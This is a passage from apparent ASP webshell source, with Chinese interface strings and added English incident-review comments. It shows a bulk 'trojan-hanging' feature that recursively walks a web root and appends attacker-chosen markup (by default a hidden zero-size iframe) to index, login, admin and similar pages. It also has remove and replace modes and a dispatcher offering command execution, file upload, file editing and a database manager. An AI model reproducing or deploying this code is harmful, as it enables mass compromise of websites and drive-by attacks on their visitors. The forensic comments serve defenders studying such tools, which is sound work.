if s="" or addcode="" then
rrs "<font color=red>请输入挂马的路径或代码!</font>"
response.end
else if ispattern("[^ab]{1}:{1}(\\|\/)",s) then sch s
end if
end if
' sch: recursive folder walk for action "plgm".
' Every file in folder s is passed by full path to step_all, then each
' subfolder is walked the same way. Errors (for example unreadable folders)
' are suppressed by on error resume next, so the walk continues past them.
sub sch(s)
on error resume next
set fs=server.createobject("scripting.filesystemobject")
set fd=fs.getfolder(s)
set fi=fd.files
set sf=fd.subfolders
for each f in fi
rtn=f.path
step_all rtn
next
if sf.count<>0 then
for each l in sf
sch l
next
end if
end sub
' step_all: target filter for action "plgm".
' agr is a full file path. It is selected only when the file's base name is
' one of the fixed names in the pattern below (default, index, conn, admin,
' login, ...) and its extension is htm, html, asp, php, jsp, aspx, cgi or js.
' Selected files are listed by step1 and then modified by step2; everything
' else is left untouched.
' For incident review this list indicates which files to compare against a
' known-good copy first.
sub step_all(agr)
retval=ispattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|qq|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr)
if retval then
step1 agr
step2 agr
else
exit sub
end if
end sub
' step1: writes one result line for a selected file: the path str1 followed
' by download/edit/delete/copy/move links that call the page's fullform
' script function (defined outside this view). Backslashes are doubled for
' the script string; no other escaping is applied to the path.
sub step1(str1)
rrs "<div style='line-height:20px'>√ "&str1&" _"
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""downfile"")' class='am' title='下载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")'onclick='return yesok()' class='am' title='删除'>删除
</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a></div>"
end sub
' step2: the write step of action "plgm".
' If str2 exists it is opened for appending (iomode 8) and the script-level
' addcode string is written at the end of the file.
' Files whose last eight characters begin with "conn" (for example a
' conn.<3-letter-ext> file) take the other branch, where write is called with
' no argument and the stream is not closed in this sub.
' Resulting artefacts: changed content at the end of the file and a new
' last-modified time; file-integrity monitoring on the web root catches both.
sub step2(str2)
set fs=server.createobject("scripting.filesystemobject")
isexist=fs.fileexists(str2)
if isexist then
set f=fs.getfile(str2)
set f_addcode=f.openastextstream(8,-2)
if left(right(str2,8),4)="conn" then
f_addcode.write
else
f_addcode.write addcode
f_addcode.close
set f=nothing
end if
end if
set fs=nothing
end sub
' Clears any error left over from the "plgm" branch above.
err.clear
' Action "cplgm": bulk edit of files under a folder, in one of three modes
' selected by request parameter m:
'   m=1  append the submitted markup (code) to each matching file
'   m=2  remove every occurrence of code from each matching file
'   m=3  replace every occurrence of code with code2
' Other parameters: fd (folder; "\" = web root, "." or empty = web root via
' mappath("/")), pcfile (file names to skip; defaults to this script's own
' file name), ftype ("|"-separated extensions), checkbox (skip files that
' already contain the markup, mode 1 only), showmsg.
' code defaults to the same zero-size iframe placeholder used by "plgm".
' All of these values are echoed into the form without HTML escaping.
case "cplgm"
fpath=request("fd")
addcode = request("code")
addcode2 = request("code2")
pcfile=request("pcfile")
checkbox=request("checkbox")
showmsg=request("showmsg")
ftype=request("ftype")
m=request("m")
if ftype="" then
ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
if fpath="\" then fpath=server.mappath("\")
if fpath="." or fpath="" then fpath=server.mappath("/")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm
width=0 height=0></iframe>"
if checkbox="" then checkbox=request("checkbox")
' Default exclusion: the last path segment of script_name, i.e. this file.
if pcfile="" then
pcfilename=request.servervariables("script_name")
pcfilek=split(pcfilename,"/")
pcfilen=ubound(pcfilek)
pcfile=pcfilek(pcfilen)
end if
rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
rrs ("<b>本程序目录</b>- "&server.mappath("."))
rrs "<form method=post><div style='color:#3399ff'><b>["
if m="1" then rrs"批量挂马器-批量挂马"
if m="2" then rrs"批量清马器-清除别人的网马"
if m="3" then rrs"批量替换器-文件替换修改工具"
' Without a mode the response ends here, leaving the form unfinished.
if m="" then response.end
rrs "]</b></div><table width=100% border=0><tr><td>文件路径:
</td>"
rrs "<td><input type=text name=fd value=""\"" size=40> 填“\”
即网站根目录;“.”为程序所在目录</td></tr>"
if m="1" then rrs "<tr><td>过滤重复:</td><td><input class=c
name='checkbox' checked='checked' type=checkbox value=""checked""
"&checkbox&"> 防止一个页面中有多个重复的代码</td></tr>"
rrs "<tr><td>排除文件:</td>"
rrs "<td><input name='pcfile' type=text id='pcfile'
value='"&pcfile&"' size=40> 输入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
rrs "<tr><td>文件类型:</td>"
rrs "<td><input name='ftype' type=text id='ftype'
value='"&ftype&"' size=40> 输入要修改的文件类型[扩展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
if m="1" then rrs"要挂的马:"
if m="2" then rrs"要清的马:"
if m="3" then rrs"查找内容:"
rrs"</font></td><td><textarea name=code cols=66
rows=3>"&addcode&"</textarea></td></tr>"
' In mode 3 the "replace with" box (code2) is pre-filled with addcode.
if m="3" then rrs "<tr><td><font color=#3399ff>替 换 为:
</font></td><td><textarea name=code2 cols=66
rows=3>"&addcode&"</textarea></td></tr>"
rrs "<tr><td></td><td> <input name=submit type=submit value=开
始执行> --标记解释--[成功:√ , 排除:× , 重复:<font color=red>×
</font>]</td></tr>"
rrs "</table></form>"
' On submit, run the recursive edit and print one log line per file.
if request("submit")="开始执行" then
rrs"<div style='line-height:25px'><b>执行记录:</b><br>"
call insertallfiles(fpath,addcode,pcfile)
rrs"</div>"
end if
' insertallfiles: recursive worker for action "cplgm".
'   wpath - folder to process (a trailing "\" is added if missing)
'   wcode - markup to append (mode 1), remove (mode 2) or search for (mode 3)
'   pc    - exclusion list; a file is skipped when its name occurs anywhere
'           in this string (substring test, case-insensitive)
' Also reads the script-level values m (mode), checkbox, ftype and addcode2
' set by the "cplgm" branch. A file is processed only when it is not excluded
' and its extension occurs in ftype (also a substring test).
' One log line per file is written to the response, followed by action links.
' Errors are suppressed throughout by on error resume next.
' For incident review: modes 2 and 3 rewrite every selected file whether or
' not its content changed, so a run shows up as a burst of identical
' last-modified times across the tree.
sub insertallfiles(wpath,wcode,pc)
server.scripttimeout=999999999
if right(wpath,1)<>"\" then wpath=wpath &"\"
set wfso = createobject("scripting.filesystemobject")
on error resume next
set f = wfso.getfolder(wpath)
set fc2 = f.files
for each myfile in fc2
set fs1 = createobject("scripting.filesystemobject")
' ftype3 = lower-cased text after the last dot, or "无" when there is no dot.
ftype1=split(myfile.name,".")
ftype2=ubound(ftype1)
if ftype2>0 then
ftype3=lcase(ftype1(ftype2))
else
ftype3="无"
end if
if instr(lcase(pc),lcase(myfile.name))=0 and instr
(lcase(ftype),ftype3)<>0 then
' Mode 1 appends (iomode 8), either unconditionally or, with checkbox set,
' only when the file does not already contain wcode. Files whose name starts
' with "conn" take a branch where write is called with no argument.
select case m
case "1"
if checkbox<>"checked" then
set
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
if left(myfile.name,4)="conn"
then
tfile.write
rrs"√
"&wpath&myfile.name
else
tfile.writeline wcode
rrs"√
"&wpath&myfile.name
tfile.close
end if
end if
if checkbox="checked" then
set
tfile1=fs1.opentextfile(wpath&""&myfile.name,1,-2)
if instr
(tfile1.readall,wcode)=0 then
set
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
if left(myfile.name,4)
="conn" then
tfile.write
rrs"×
"&wpath&myfile.name
else
tfile.writeline wcode
rrs"√
"&wpath&myfile.name
tfile1.close
end if
else
rrs"<font
color=red>×</font> "&wpath&myfile.name
tfile1.close
end if
set tfile1=nothing
end if
' Mode 2: read the file, delete every occurrence of wcode, overwrite the file.
case "2"
set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
newcode=replace
(tfile1.readall,wcode,"")
set
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
objcountfile.write newcode
objcountfile.close
rrs"√ "&wpath&myfile.name
set objcountfile=nothing
' Mode 3: same as mode 2, but wcode is replaced with addcode2.
case "3"
set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
newcode=replace
(tfile1.readall,wcode,addcode2)
set
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
objcountfile.write newcode
objcountfile.close
rrs"√ "&wpath&myfile.name
set objcountfile=nothing
case else
rrs"大哥,别乱来.":response.end
end select
else
rrs"× "&wpath&myfile.name
end if
' Per-file action links, written for processed and skipped files alike.
rrs " → <a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""downfile"")' class='am' title='下
载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""editfile"")' class='am' title='编
辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")' onclick='return yesok()' class='am' title='删除'>删
除</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""copyfile"")' class='am' title='复
制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""movefile"")' class='am' title='移
动'>移动</a><br>"
next
' Recurse into every subfolder with the same markup and exclusion list.
set fsubfolers = f.subfolders
for each f1 in fsubfolers
newpath=wpath&""&f1.name
insertallfiles newpath,wcode,pc
next
set tfile=nothing
set fso = nothing
set tfile=nothing
set tfile2=nothing
set wfso = nothing
end sub
' Remaining branches of the action dispatcher. Each value of the action
' request parameter maps to one capability: registry read, file listing,
' download/delete/edit/copy/move of files, delete/copy/move/create of
' folders, upload, command execution (cmd1shell), database manager, and
' server information. The handlers and the lbf class are defined outside
' this view.
' action is read with request("action") at the top of the script, so it can
' arrive in the POST body as well as the query string; URL-only access logs
' will not show every use of these values.
' "logout" removes the session entry "web2a2dmin" - presumably the login
' flag; confirm against the login code.
case "readreg":call readreg()
case "show1file":set abc=new lbf:abc.show1file(session
("folderpath")):set abc=nothing
case "downfile":downfile fname:showerr()
case "delfile":set abc=new lbf:abc.delfile(fname):set abc=nothing
case "editfile":set abc=new lbf:abc.editfile(fname):set abc=nothing
case "copyfile":set abc=new lbf:abc.copyfile(fname):set abc=nothing
case "movefile":set abc=new lbf:abc.movefile(fname):set abc=nothing
case "delfolder":set abc=new lbf:abc.delfolder(fname):set abc=nothing
case "copyfolder":set abc=new lbf:abc.copyfolder(fname):set
abc=nothing
case "movefolder":set abc=new lbf:abc.movefolder(fname):set
abc=nothing
case "newfolder":set abc=new lbf:abc.newfolder(fname):set abc=nothing
case "upfile":upfile()
case "cmd1shell":cmd1shell()
case "logout":session.contents.remove("web2a2dmin"):response.redirect
url
case "dbmanager":dbmanager()
case "course":course()
case "serverinfo":serverinfo()
case else mainform()
end select
' Any pending error is printed for every action except "servu".
if action<>"servu" then showerr()
rrs"</body></html>"
%>